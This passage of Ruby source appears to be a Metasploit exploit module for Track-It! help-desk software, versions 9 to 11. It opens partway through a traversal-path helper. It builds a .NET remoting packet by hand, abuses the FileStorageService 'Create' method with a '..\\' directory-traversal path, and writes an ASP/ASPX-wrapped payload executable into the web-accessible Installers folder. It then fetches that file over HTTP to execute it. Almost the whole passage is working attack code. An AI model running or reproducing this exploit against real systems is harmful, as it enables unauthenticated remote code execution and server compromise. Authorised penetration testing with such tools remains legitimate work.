if file_storage_dir != nil and web_data_dir != nil
|
||||
# Now we need to adjust the paths before we calculate the traversal_size
|
||||
# On the web_data_dir, trim the last part (the Cache directory) and add the Web\Installers part
|
||||
# which is the path accessible without authentication.
|
||||
# On the file_storage_dir, add the IncidentRepository part where the files land by default.
|
||||
# We then find the common string and calculate the traversal_path.
|
||||
web_data_dir = web_data_dir[0,web_data_dir.rindex("\\")] + "\\Web\\Installers\\"
|
||||
file_storage_dir << "\\Repositories\\IncidentRepository"
|
||||
common_str = longest_common_substr([file_storage_dir, web_data_dir])
|
||||
traversal_size = file_storage_dir[common_str.rindex("\\"), file_storage_dir.length].scan("\\").length
|
||||
traversal_path = "..\\" * traversal_size + web_data_dir[common_str.rindex("\\") + 1,common_str.length]
|
||||
return traversal_path
|
||||
else
|
||||
return nil
|
||||
end
|
||||
# Note: version 8 always returns nil as the GetProductDeploymentValues does not exist
|
||||
end
|
||||
|
||||
|
||||
def send_file(traversal_path, filename, file_content)
|
||||
#
|
||||
# FileStorageService packet structure:
|
||||
#
|
||||
# @packet_header_pre_packet_size
|
||||
# packet_size (4 bytes)
|
||||
# @packet_header_pre_uri_size
|
||||
# uri_size (2 bytes)
|
||||
# @packet_header_pre_uri
|
||||
# uri
|
||||
# @packet_header_post_uri
|
||||
# packet_body_start_pre_method_size
|
||||
# method_size (1 byte)
|
||||
# method
|
||||
# @packet_body_pre_type_size
|
||||
# type_size (1 byte)
|
||||
# @packet_body_pre_type
|
||||
# type
|
||||
# packet_body_pre_repository_size
|
||||
# repository_size (1 byte)
|
||||
# repository
|
||||
# packet_body_pre_filepath_size
|
||||
# filepath_size (1 byte)
|
||||
# filepath
|
||||
# packet_body_pre_binary_lib_size
|
||||
# binary_lib_size (1 byte)
|
||||
# binary_lib
|
||||
# packet_body_pre_file_content_decl_size
|
||||
# file_content_decl_size (1 byte)
|
||||
# file_content_decl
|
||||
# packet_body_pre_filesize
|
||||
# file_size (4 bytes)
|
||||
# packet_body_pre_filecontent
|
||||
# file_content
|
||||
# @packet_terminator
|
||||
#
|
||||
# .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx
|
||||
#
|
||||
packet_body_start_pre_method_size = [
|
||||
0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff,
|
||||
0xff, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x15, 0x14, 0x00, 0x00, 0x00, 0x12
|
||||
]
|
||||
|
||||
packet_body_pre_repository_size = [
|
||||
0x10, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
|
||||
0x00, 0x0a, 0x09, 0x02, 0x00, 0x00, 0x00, 0x06,
|
||||
0x03, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_filepath_size = [
|
||||
0x06, 0x04, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_binary_lib_size = [
|
||||
0x0c, 0x05, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_file_content_decl_size = [
|
||||
0x05, 0x02, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_file_size = [
|
||||
0x01, 0x00, 0x00, 0x00, 0x09, 0x5f, 0x72, 0x61,
|
||||
0x77, 0x42, 0x79, 0x74, 0x65, 0x73, 0x07, 0x02,
|
||||
0x05, 0x00, 0x00, 0x00, 0x09, 0x06, 0x00, 0x00,
|
||||
0x00, 0x0f, 0x06, 0x00, 0x00, 0x00
|
||||
]
|
||||
|
||||
packet_body_pre_filecontent = [ 0x02 ]
|
||||
|
||||
service = "TrackIt.Core.FileStorageService".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
method = "Create"
|
||||
type = "TrackIt.Core.FileStorage.IFileStorageSecureDelegator, TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
repository = "IncidentRepository"
|
||||
binary_lib = "TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
file_content_decl = "TrackIt.Core.FileStorage.FileContent".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
|
||||
uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
|
||||
|
||||
filepath = traversal_path + filename
|
||||
|
||||
packet_size =
|
||||
@packet_header_pre_uri_size.length +
|
||||
2 + # uri_size
|
||||
@packet_header_pre_uri.length +
|
||||
uri.length +
|
||||
@packet_header_post_uri.length +
|
||||
packet_body_start_pre_method_size.length +
|
||||
1 + # method_size
|
||||
method.length +
|
||||
@packet_body_pre_type_size.length +
|
||||
1 + # type_size
|
||||
@packet_body_pre_type.length +
|
||||
type.length +
|
||||
packet_body_pre_repository_size.length +
|
||||
1 + # repository_size
|
||||
repository.length +
|
||||
packet_body_pre_filepath_size.length +
|
||||
1 + # filepath_size
|
||||
filepath.length +
|
||||
packet_body_pre_binary_lib_size.length +
|
||||
1 + # binary_lib_size
|
||||
binary_lib.length +
|
||||
packet_body_pre_file_content_decl_size.length +
|
||||
1 + # file_content_decl_size
|
||||
file_content_decl.length +
|
||||
packet_body_pre_file_size.length +
|
||||
4 + # file_size
|
||||
packet_body_pre_filecontent.length +
|
||||
file_content.length
|
||||
|
||||
# start of packet and packet size (4 bytes)
|
||||
buf = @packet_header_pre_packet_size.pack('C*')
|
||||
buf << Array(packet_size).pack('L*')
|
||||
|
||||
# uri size (2 bytes)
|
||||
buf << @packet_header_pre_uri_size.pack('C*')
|
||||
buf << Array(uri.length).pack('S*')
|
||||
|
||||
# uri
|
||||
buf << @packet_header_pre_uri.pack('C*')
|
||||
buf << uri.bytes.to_a.pack('C*')
|
||||
buf << @packet_header_post_uri.pack('C*')
|
||||
|
||||
# method name
|
||||
buf << packet_body_start_pre_method_size.pack('C*')
|
||||
buf << Array(method.length).pack('C*')
|
||||
buf << method.bytes.to_a.pack('C*')
|
||||
|
||||
# type name
|
||||
buf << @packet_body_pre_type_size.pack('C*')
|
||||
buf << Array(type.length).pack('C*')
|
||||
buf << @packet_body_pre_type.pack('C*')
|
||||
buf << type.bytes.to_a.pack('C*')
|
||||
|
||||
# repository name
|
||||
buf << packet_body_pre_repository_size.pack('C*')
|
||||
buf << Array(repository.length).pack('C*')
|
||||
buf << repository.bytes.to_a.pack('C*')
|
||||
|
||||
# filepath
|
||||
buf << packet_body_pre_filepath_size.pack('C*')
|
||||
buf << Array(filepath.length).pack('C*')
|
||||
buf << filepath.bytes.to_a.pack('C*')
|
||||
|
||||
# binary lib name
|
||||
buf << packet_body_pre_binary_lib_size.pack('C*')
|
||||
buf << Array(binary_lib.length).pack('C*')
|
||||
buf << binary_lib.bytes.to_a.pack('C*')
|
||||
|
||||
# file content decl
|
||||
buf << packet_body_pre_file_content_decl_size.pack('C*')
|
||||
buf << Array(file_content_decl.length).pack('C*')
|
||||
buf << file_content_decl.bytes.to_a.pack('C*')
|
||||
|
||||
# file size (4 bytes)
|
||||
buf << packet_body_pre_file_size.pack('C*')
|
||||
buf << Array(file_content.length).pack('L*')
|
||||
|
||||
# file contents
|
||||
buf << packet_body_pre_filecontent.pack('C*')
|
||||
buf << file_content
|
||||
|
||||
buf << @packet_terminator.pack('C*')
|
||||
|
||||
# send the packet and ignore the response
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
|
||||
if sock.nil?
|
||||
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
|
||||
else
|
||||
print_status("#{rhost}:#{@remoting_port} - Uploading payload to #(unknown)")
|
||||
end
|
||||
sock.write(buf)
|
||||
sock.close
|
||||
# We can't really register our files for cleanup as most of the time we run under the IIS user, not SYSTEM
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
@packet_header_pre_packet_size= [
|
||||
0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00
|
||||
]
|
||||
|
||||
@packet_header_pre_uri_size = [
|
||||
0x04, 0x00, 0x01, 0x01
|
||||
]
|
||||
|
||||
@packet_header_pre_uri = [
|
||||
0x00, 0x00
|
||||
]
|
||||
|
||||
# contains binary type (application/octet-stream)
|
||||
@packet_header_post_uri = [
|
||||
0x06, 0x00, 0x01, 0x01, 0x18, 0x00, 0x00, 0x00,
|
||||
0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74,
|
||||
0x69, 0x6f, 0x6e, 0x2f, 0x6f, 0x63, 0x74, 0x65,
|
||||
0x74, 0x2d, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d,
|
||||
0x00, 0x00
|
||||
]
|
||||
|
||||
@packet_body_pre_type_size = [ 0x12 ]
|
||||
|
||||
@packet_body_pre_type = [ 0x01 ]
|
||||
|
||||
@packet_terminator = [ 0x0b ]
|
||||
|
||||
version = get_version
|
||||
if version != nil
|
||||
@version = version[0].to_i
|
||||
else
|
||||
# We assume it's version 9 or below because we couldn't find any version identifiers
|
||||
@version = 9
|
||||
end
|
||||
|
||||
@remoting_port = datastore['RPORT_REMOTING']
|
||||
|
||||
traversal_path = get_traversal_path
|
||||
if traversal_path == nil
|
||||
print_error("#{rhost}:#{@remoting_port} - Could not get traversal path, falling back to defaults")
|
||||
case @version
|
||||
when 9
|
||||
traversal_path = "..\\..\\..\\..\\Web Add-On\\Web\\Installers\\"
|
||||
when 10
|
||||
traversal_path = "..\\..\\..\\..\\..\\Numara Track-It! Web\\Web\\Installers\\"
|
||||
when 11
|
||||
traversal_path = "..\\..\\..\\..\\..\\Track-It! Web\\Web\\Installers\\"
|
||||
end
|
||||
end
|
||||
|
||||
# generate our payload
|
||||
exe = generate_payload_exe
|
||||
if @version == 9
|
||||
file_content = Msf::Util::EXE.to_exe_asp(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".asp"
|
||||
else
|
||||
file_content = Msf::Util::EXE.to_exe_aspx(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".aspx"
|
||||
end
|
||||
|
||||
send_file(traversal_path, filename, file_content)
|
||||
|
||||
# sleep a few seconds, sometimes the service takes a while to write to disk
|
||||
sleep(datastore['SLEEP'])
|
||||
|
||||
print_status("#{peer} - Executing payload")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res
|
||||
if res.code == 500
|
||||
print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX"))
|
||||
# try again but now use ASPX instead of ASP or vice-versa
|
||||
if @version == 9
|
||||
file_content = Msf::Util::EXE.to_exe_aspx(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".aspx"
|
||||
else
|
||||
file_content = Msf::Util::EXE.to_exe_asp(exe)
|
||||
filename = rand_text_alpha_lower(rand(6) + 6) + ".asp"
|
||||
end
|
||||
send_file(traversal_path, filename, file_content)
|
||||
|
||||
# sleep a few seconds, sometimes the service takes a while to write to disk
|
||||
sleep(datastore['SLEEP'])
|
||||
|
||||
print_status("#{peer} - Executing payload")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
||||
if not res or res.code != 200
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Could not execute payload" + (res ? ", got HTTP code #{res.code.to_s}": ""))
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
end
|